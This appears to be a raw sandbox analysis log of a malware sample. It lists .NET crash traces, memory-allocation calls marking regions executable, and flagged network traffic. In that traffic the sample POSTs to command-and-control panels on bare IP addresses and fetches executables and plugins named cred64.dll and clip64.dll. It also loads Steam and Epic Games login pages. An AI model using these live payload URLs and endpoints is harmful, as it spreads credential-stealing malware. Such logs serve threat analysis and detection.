registers.esi: 42379592
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x220ccd9
0x2209392
0x22087cc
0x2207f40
0x22034a0
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 52 04 3b 55 dc 0f 8f 7f fe ff ff eb 0c e8 0f
exception.instruction: mov edx, dword ptr [edx + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x220cf23
registers.esp: 34402700
registers.edi: 37974060
registers.eax: 43729292
registers.ebp: 34402752
registers.edx: 0
registers.ebx: 42509236
registers.esi: 43729292
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x220cfa9
0x2209432
0x22087cc
0x2207f40
0x22034a0
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 b1
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x220d181
registers.esp: 34402700
registers.edi: 37974060
registers.eax: 0
registers.ebp: 34402752
registers.edx: 0
registers.ebx: 38245856
registers.esi: 38845676
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x220cfa9
0x2209432
0x22087cc
0x2207f40
0x22034a0
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 b1
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x220d181
registers.esp: 34402700
registers.edi: 37974060
registers.eax: 0
registers.ebp: 34402752
registers.edx: 0
registers.ebx: 39114564
registers.esi: 40334612
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x220cfa9
0x2209432
0x22087cc
0x2207f40
0x22034a0
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f e7 fe ff ff eb 0c e8 b1
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x220d181
registers.esp: 34402700
registers.edi: 37974060
registers.eax: 0
registers.ebp: 34402752
registers.edx: 0
registers.ebx: 40603500
registers.esi: 41823548
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x220d2d9
0x22094be
0x22087cc
0x2207f40
0x22034a0
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 88
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x220d4aa
registers.esp: 34402700
registers.edi: 39524244
registers.eax: 0
registers.ebp: 34402752
registers.edx: 0
registers.ebx: 38659156
registers.esi: 39258976
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x220d2d9
0x22094be
0x22087cc
0x2207f40
0x22034a0
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 88
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x220d4aa
registers.esp: 34402700
registers.edi: 39524244
registers.eax: 0
registers.ebp: 34402752
registers.edx: 0
registers.ebx: 39530196
registers.esi: 40750244
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x220d2d9
0x22094be
0x22087cc
0x2207f40
0x22034a0
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 3b 45 dc 0f 8f 05 ff ff ff eb 0c e8 88
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x220d4aa
registers.esp: 34402700
registers.edi: 39524244
registers.eax: 0
registers.ebp: 34402752
registers.edx: 0
registers.ebx: 41021464
registers.esi: 42241512
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x220d864
0x22087e4
0x2207f40
0x22034a0
0x2203126
0x2201b93
0x2201b5c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72382652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7239264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72392e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72447610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x724d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x724d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x724d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x724d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73257f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73254de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 3b 45 e0 0f 8f a1 fe ff ff eb 05 e8 98
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x220dc9a
registers.esp: 34403196
registers.edi: 42786108
registers.eax: 0
registers.ebp: 34403240
registers.edx: 0
registers.ebx: 42779900
registers.esi: 42786792
registers.ecx: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://167.235.20.126/bjdm32DP/index.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://167.235.20.126/bjdm32DP/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://171.22.28.213/1.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://167.235.20.126/bjdm32DP/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://167.235.20.126/bjdm32DP/Plugins/clip64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.196.9.171/abd.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://194.169.175.118/trafico.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.196.8.176/7jshasdS/index.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.196.8.176/7jshasdS/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.196.9.171/haloup.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://5.182.86.30/TEST32.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.196.9.171/amers.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.196.8.176/7jshasdS/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.196.8.176/7jshasdS/Plugins/clip64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://171.22.28.213/build2.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://171.22.28.213/TEST32.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.107.182.2/race/lom30.exe
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://193.233.255.73/loghub/master
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://77.91.124.1/theme/index.php
request POST http://167.235.20.126/bjdm32DP/index.php
request POST http://167.235.20.126/bjdm32DP/index.php?scr=1
request GET http://171.22.28.213/1.exe
request GET http://167.235.20.126/bjdm32DP/Plugins/cred64.dll
request GET http://167.235.20.126/bjdm32DP/Plugins/clip64.dll
request GET http://185.196.9.171/abd.exe
request GET http://194.169.175.118/trafico.exe
request POST http://185.196.8.176/7jshasdS/index.php
request POST http://185.196.8.176/7jshasdS/index.php?scr=1
request GET http://185.196.9.171/haloup.exe
request GET http://5.182.86.30/TEST32.exe
request GET http://185.196.9.171/amers.exe
request GET http://185.196.8.176/7jshasdS/Plugins/cred64.dll
request GET http://185.196.8.176/7jshasdS/Plugins/clip64.dll
request GET http://171.22.28.213/build2.exe
request GET http://171.22.28.213/TEST32.exe
request GET http://109.107.182.2/race/lom30.exe
request POST http://193.233.255.73/loghub/master
request POST http://77.91.124.1/theme/index.php
request GET https://steamcommunity.com/openid/loginform/
request GET https://www.epicgames.com/id/login
request GET https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=english&_cdn=cloudflare
request GET https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=english&_cdn=cloudflare
request GET https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Fd2aj_zaBVQV&l=english&_cdn=cloudflare
request GET https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&_cdn=cloudflare
request GET https://community.cloudflare.steamstatic.com/public/shared/css/login.css?v=0H1th98etnSV&l=english&_cdn=cloudflare
request GET https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=english&_cdn=cloudflare&load=effects,controls,slider,dragdrop
request GET https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&_cdn=cloudflare
request GET https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=E78TCC6Eu4d1&l=english&_cdn=cloudflare
request GET https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&_cdn=cloudflare
request GET https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=3Pb1f2YLp788&l=english&_cdn=cloudflare
request GET https://community.cloudflare.steamstatic.com/public/shared/javascript/login.js?v=gYtbaAKt6bwQ&l=english&_cdn=cloudflare
request GET https://static-assets-prod.unrealengine.com/account-portal/static/static/js/3.520a7eda.chunk.js
request GET https://static-assets-prod.unrealengine.com/account-portal/static/static/js/main.10a25667.chunk.js
request GET https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvIAKtunfWg&l=english&_cdn=cloudflare
request GET https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
request GET https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
request GET https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
request GET https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
request GET https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=uR_4hRD_HUln&l=english&_cdn=cloudflare
request GET https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&l=english&_cdn=cloudflare
request GET https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=RL7hpFRFPE4A&l=english&_cdn=cloudflare
request GET https://community.cloudflare.steamstatic.com/public/css/skin_1/home.css?v=-6qQi3rZclGf&l=english&_cdn=cloudflare
request GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Regular.ttf?v=4.015
request GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Light.ttf?v=4.015
request GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Thin.ttf?v=4.015
request GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Medium.ttf?v=4.015
request GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-Bold.ttf?v=4.015
request GET https://community.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-RegularItalic.ttf?v=4.015
request GET https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=eYJYuhv32ILn&l=english&_cdn=cloudflare
request POST http://167.235.20.126/bjdm32DP/index.php
request POST http://167.235.20.126/bjdm32DP/index.php?scr=1
request POST http://185.196.8.176/7jshasdS/index.php
request POST http://185.196.8.176/7jshasdS/index.php?scr=1
request POST http://193.233.255.73/loghub/master
request POST http://77.91.124.1/theme/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2560
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ac0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1452
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000046a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72c62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0041c000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 1048576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01df0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01eb0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 983040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01ff0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72381000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72382000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02320000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00562000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0057c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x005a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0056a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0058a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00587000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0057a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022c3000
